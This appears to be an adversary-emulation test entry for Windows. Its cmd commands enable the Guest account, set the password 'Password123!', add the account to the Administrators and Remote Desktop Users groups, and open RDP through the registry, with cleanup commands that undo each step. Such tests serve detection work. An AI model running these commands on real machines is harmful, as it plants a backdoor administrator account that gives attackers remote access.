#TechniqueName: Valid Accounts: Default Accounts
#AtomicTestName: Enable Guest account with RDP capability and admin priviliges
#Description: After execution the Default Guest account will be enabled (Active) and added to Administrators and Remote Desktop Users Group, and desktop will allow multiple RDP connections
#Language: cmd

#commands
net user guest /active:yes
net user guest Password123!
net localgroup administrators guest /add
net localgroup "Remote Desktop Users" guest /add
reg add "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f

#cleanup_commands
net user guest /active:no >nul 2>&1
net localgroup administrators guest /delete >nul 2>&1
net localgroup "Remote Desktop Users" guest /delete >nul 2>&1
reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /f >nul 2>&1
reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /f >nul 2>&1
